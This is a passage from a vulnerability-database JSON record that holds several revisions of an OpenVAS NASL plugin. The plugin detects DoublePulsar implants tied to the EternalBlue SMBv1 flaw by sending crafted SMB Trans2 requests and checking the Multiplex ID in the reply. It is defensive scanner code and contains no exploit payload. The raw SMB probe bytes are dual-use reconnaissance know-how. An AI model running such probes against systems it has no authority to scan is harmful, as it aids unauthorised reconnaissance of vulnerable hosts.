"http://plugins.openvas.org/nasl.php?oid=1361412562310810698", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/countercept/doublepulsar-detection-script"], "cvelist": ["CVE-2017-0147", "CVE-2017-0146"], "lastseen": "2017-07-02T21:14:35", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "pluginID": "1361412562310810698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_doublepulsar_infection_detect.nasl 5972 2017-04-18 17:45:20Z veerendragg $\n#\n# Double Pulsar Infection Detect\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810698\");\n script_version(\"$Revision: 5972 $\");\n script_cve_id(\"CVE-2017-0146\", \"CVE-2017-0147\");\n script_bugtraq_id(96707, 96709);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-18 19:45:20 +0200 (Tue, 18 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 15:25:17 +0530 (Tue, 18 Apr 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_name(\"Double Pulsar Infection Detect\");\n\n script_tag(name:\"summary\", value:\"This host is vulnerable to 'Eternalblue'\n tool attack and is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send an SMB trans2 session setup request\n and check for presence of Multiplex ID '0x51' in the response.\");\n\n script_tag(name:\"insight\", value:\"An SMBv1 (Server Message Block 1.0) exploit\n that could trigger a RCE in older versions of Windows dubbed as 'ETERNALBLUE'\n has been discovered in latest dump of NSA Tools. One covert channel, 'double\n pulsar', is designed to particular for systems that are vulnerable to Eternalblue.\n The covert channel uses SMB features that have so far been not used, in\n particular, the 'Trans2' feature.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on the affected system. Failed attacks \n will cause denial of service conditions.\n\n Impact Level: System/Application\");\n\n script_tag(name:\"affected\", value:\"All Windows Platforms from Windows XP\n through Windows 2012\");\n\n script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory\n from the below link, https://technet.microsoft.com/library/security/MS17-010\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"https://github.com/countercept/doublepulsar-detection-script\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\n##\n## Code starts here\n##\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\n## Variable Initialization\nname = \"\";\nsmbPort = \"\";\nsoc = \"\";\nsmb_neg_req = \"\";\nsmb_neg_resp = \"\";\nsmb_sess_req = \"\";\nsmb_sess_resp = \"\";\nsmb_tree_resp = \"\";\nsmbtrans2_request = \"\";\nsmb_trans2_resp = \"\";\ntid_low = \"\";\ntid_high = \"\";\nuid_low = \"\";\nuid_high = \"\";\nuid = \"\";\n\n## exit, if its not windows\nif(host_runs(\"Windows\") != \"yes\") exit(0);\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\n\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42, \n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x53, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, \n 0x00, 0x00, 0x40, 0x00, 0x00, 0x62, 0x00, 0x02, \n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, \n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, \n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02, \n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, \n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f, \n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57, \n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70, \n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02, \n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30, \n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, \n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54, \n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, \n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( !smb_neg_resp || !ord(smb_neg_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n\n## SMB Session Setup AndX Request,Anonymous User\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d, 0x42, \n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, \n 0x00, 0x00, 0x40, 0x00, 0x0d, 0xff, 0x00, 0x88, \n 0x00, 0x04, 0x11, 0x0a, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0xd4, 0x00, 0x00, 0x00, 0x4b, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00, \n 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, \n 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, \n 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00, \n 0x32, 0x00, 0x31, 0x00, 0x39, 0x00, 0x35, 0x00, \n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, \n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, \n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, \n 0x30, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00, \n 0x30, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n## Session Setup AndX Response\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! smb_sess_resp || !ord(smb_neg_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\n\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(! smb_tree_resp || !ord(smb_tree_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\n\n## SMB TRANS2 Request\nsmbtrans2_request = raw_string(0x00, 0x00, 0x00, 0x4e, 0xff, 0x53, 0x4d, 0x42, \n 0x32, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00) + raw_string(tid_low, tid_high) +\n raw_string(0xff, 0xfe) + raw_string(uid_low, uid_high) +\n raw_string(0x41, 0x00, 0x0f, 0x0c, 0x00, 0x00, \n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0xa6, 0xd9, 0xa4, 0x00, 0x00, 0x00, 0x0c, \n 0x00, 0x42, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x01, \n 0x00, 0x0e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00 );\n\nsend( socket:soc, data: smbtrans2_request);\n##Trans2 Response, SESSION_SETUP, Error: STATUS_NOT_IMPLEMENTED\nsmb_trans2_resp = smb_recv( socket:soc );\n##The intent of this request is to check if the system is already compromised.\n##Infected or not, the system will respond with a \"Not Implemented\" message.\nif(smb_trans2_resp && (ord(smb_trans2_resp[9])==2 && ord(smb_trans2_resp[10])==0\n && ord(smb_trans2_resp[11])==0 && ord(smb_trans2_resp[12])==192))\n{\n ##As part of the message, a \"Multiplex ID\" is returned.\n ##For normal systems it is 65 (0x41) and for infected systems it is 81 (0x51).\n if(ord(smb_trans2_resp[34]) == 81)\n {\n security_message(port:smbPort );\n close(soc);\n exit(0);\n }\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["references", "modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T21:14:35"}, {"bulletin": {"id": "OPENVAS:1361412562310810698", "hash": "f965112c99785f13cf6356b9533ba7406843424d7437cad6ab973f774d3e537d", "type": "openvas", "bulletinFamily": "scanner", "title": "Double Pulsar Infection Detect", "description": "This host is vulnerable to ", "published": "2017-04-18T00:00:00", "modified": "2017-10-24T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810698", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/countercept/doublepulsar-detection-script", "http://blog.binaryedge.io/2017/04/21/doublepulsar", "https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312"], "cvelist": ["CVE-2017-0147", "CVE-2017-0146"], "lastseen": "2018-09-01T23:40:40", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_doublepulsar_infection_detect.nasl 7543 2017-10-24 11:02:02Z cfischer $\n#\n# Double Pulsar Infection Detect\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com> on 2017-06-28Fixed the validation issues.\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810698\");\n script_version(\"$Revision: 7543 $\");\n script_cve_id(\"CVE-2017-0146\", \"CVE-2017-0147\");\n script_bugtraq_id(96707, 96709);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:02:02 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 15:25:17 +0530 (Tue, 18 Apr 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_name(\"Double Pulsar Infection Detect\");\n\n script_tag(name:\"summary\", value:\"This host is vulnerable to 'Eternalblue'\n tool attack and is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send an SMB trans2 session setup request\n and check for presence of Multiplex ID '0x51' in the response.\");\n\n script_tag(name:\"insight\", value:\"An SMBv1 (Server Message Block 1.0) exploit\n that could trigger a RCE in older versions of Windows dubbed as 'ETERNALBLUE'\n has been discovered in latest dump of NSA Tools. One covert channel, 'double\n pulsar', is designed to particular for systems that are vulnerable to Eternalblue.\n The covert channel uses SMB features that have so far been not used, in\n particular, the 'Trans2' feature.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on the affected system. Failed attacks \n will cause denial of service conditions.\n\n Impact Level: System/Application\");\n\n script_tag(name:\"affected\", value:\"All Windows Platforms from Windows XP\n through Windows 2012\");\n\n script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory\n from the below link, https://technet.microsoft.com/library/security/MS17-010\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"https://github.com/countercept/doublepulsar-detection-script\");\n script_xref(name : \"URL\" , value : \"https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312\");\n script_xref(name : \"URL\" , value : \"http://blog.binaryedge.io/2017/04/21/doublepulsar\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\n## Variable Initialization\nname = \"\";\nsmbPort = \"\";\nsoc = \"\";\nsmb_neg_req = \"\";\nsmb_neg_resp = \"\";\nsmb_sess_req = \"\";\nsmb_sess_resp = \"\";\nsmb_tree_resp = \"\";\nsmbtrans2_request = \"\";\nsmb_trans2_resp = \"\";\ntid_low = \"\";\ntid_high = \"\";\nuid_low = \"\";\nuid_high = \"\";\nuid = \"\";\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42, \n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x53, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, \n 0x00, 0x00, 0x40, 0x00, 0x00, 0x62, 0x00, 0x02, \n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, \n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, \n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02, \n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, \n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f, \n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57, \n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70, \n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02, \n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30, \n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, \n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54, \n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, \n 0x00);\n\n## SMB Negotiate Protocol Response\nsend( socket:soc, data:smb_neg_req );\nsmb_neg_resp = smb_recv( socket:soc );\nif(strlen(smb_neg_resp) < 9 || !ord(smb_neg_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n\n## SMB Session Setup AndX Request,Anonymous User\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d, 0x42, \n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, \n 0x00, 0x00, 0x40, 0x00, 0x0d, 0xff, 0x00, 0x88, \n 0x00, 0x04, 0x11, 0x0a, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0xd4, 0x00, 0x00, 0x00, 0x4b, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00, \n 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, \n 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, \n 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00, \n 0x32, 0x00, 0x31, 0x00, 0x39, 0x00, 0x35, 0x00, \n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, \n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, \n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, \n 0x30, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00, \n 0x30, 0x00, 0x00, 0x00);\n\n## Session Setup AndX Response\nsend( socket:soc, data:smb_sess_req );\nsmb_sess_resp = smb_recv( socket:soc );\nif(strlen(smb_sess_resp) < 9 || !ord(smb_sess_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(strlen(smb_tree_resp) < 9 || !ord(smb_tree_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\n\n## SMB TRANS2 Request\nsmbtrans2_request = raw_string(0x00, 0x00, 0x00, 0x4e, 0xff, 0x53, 0x4d, 0x42, \n 0x32, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00) + raw_string(tid_low, tid_high) +\n raw_string(0xff, 0xfe) + raw_string(uid_low, uid_high) +\n raw_string(0x41, 0x00, 0x0f, 0x0c, 0x00, 0x00, \n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0xa6, 0xd9, 0xa4, 0x00, 0x00, 0x00, 0x0c, \n 0x00, 0x42, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x01, \n 0x00, 0x0e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00 );\n\nsend( socket:soc, data: smbtrans2_request);\n\n##Trans2 Response, SESSION_SETUP, Error: STATUS_NOT_IMPLEMENTED\nsmb_trans2_resp = smb_recv( socket:soc );\nif(strlen(smb_trans2_resp) < 34)\n{\n close( soc );\n exit( 0 );\n}\n\n##The intent of this request is to check if the system is already compromised.\n##Infected or not, the system will respond with a \"Not Implemented\" message.\nif(smb_trans2_resp && (ord(smb_trans2_resp[9])==2 && ord(smb_trans2_resp[10])==0\n && ord(smb_trans2_resp[11])==0 && ord(smb_trans2_resp[12])==192))\n{\n ##As part of the message, a \"Multiplex ID\" is returned.\n ##For normal systems it is 65 (0x41) and for infected systems it is 81 (0x51).\n if(ord(smb_trans2_resp[34]) == 81)\n {\n security_message(port:smbPort );\n close(soc);\n exit(0);\n }\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["references", "modified", "sourceData"], "edition": 5, "lastseen": "2018-09-01T23:40:40"}, {"bulletin": {"id": "OPENVAS:1361412562310810698", "hash": "fed1fbf7c72b82723554d03c9eca63d8211b31095941cfb5fb17d4594e4bed89", "type": "openvas", "bulletinFamily": "scanner", "title": "Double Pulsar Infection Detect", "description": "This host is vulnerable to ", "published": "2017-04-18T00:00:00", "modified": "2019-05-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810698", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://technet.microsoft.com/library/security/MS17-010", "https://github.com/countercept/doublepulsar-detection-script", "http://blog.binaryedge.io/2017/04/21/doublepulsar", "https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312"], "cvelist": ["CVE-2017-0147", "CVE-2017-0146"], "lastseen": "2019-05-06T14:28:51", "history": [], "viewCount": 34, "enchantments": {"dependencies": {"modified": "2019-05-06T14:28:51", "references": [{"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146"], "type": "cve"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["SMNTC-96709", "SMNTC-96707"], "type": "symantec"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Double Pulsar Infection Detect\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com> on 2017-06-28Fixed the validation issues.\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810698\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-0146\", \"CVE-2017-0147\");\n script_bugtraq_id(96707, 96709);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 15:25:17 +0530 (Tue, 18 Apr 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_name(\"Double Pulsar Infection Detect\");\n\n script_tag(name:\"summary\", value:\"This host is vulnerable to 'Eternalblue'\n tool attack and is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send an SMB trans2 session setup request\n and check for presence of Multiplex ID '0x51' in the response.\");\n\n script_tag(name:\"insight\", value:\"An SMBv1 (Server Message Block 1.0) exploit\n that could trigger a RCE in older versions of Windows dubbed as 'ETERNALBLUE'\n has been discovered in latest dump of NSA Tools. One covert channel, 'double\n pulsar', is designed to particular for systems that are vulnerable to Eternalblue.\n The covert channel uses SMB features that have so far been not used, in\n particular, the 'Trans2' feature.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on the affected system. Failed attacks\n will cause denial of service conditions.\");\n\n script_tag(name:\"affected\", value:\"All Windows Platforms from Windows XP\n through Windows 2012\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://github.com/countercept/doublepulsar-detection-script\");\n script_xref(name:\"URL\", value:\"https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312\");\n script_xref(name:\"URL\", value:\"http://blog.binaryedge.io/2017/04/21/doublepulsar\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x53, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe,\n 0x00, 0x00, 0x40, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 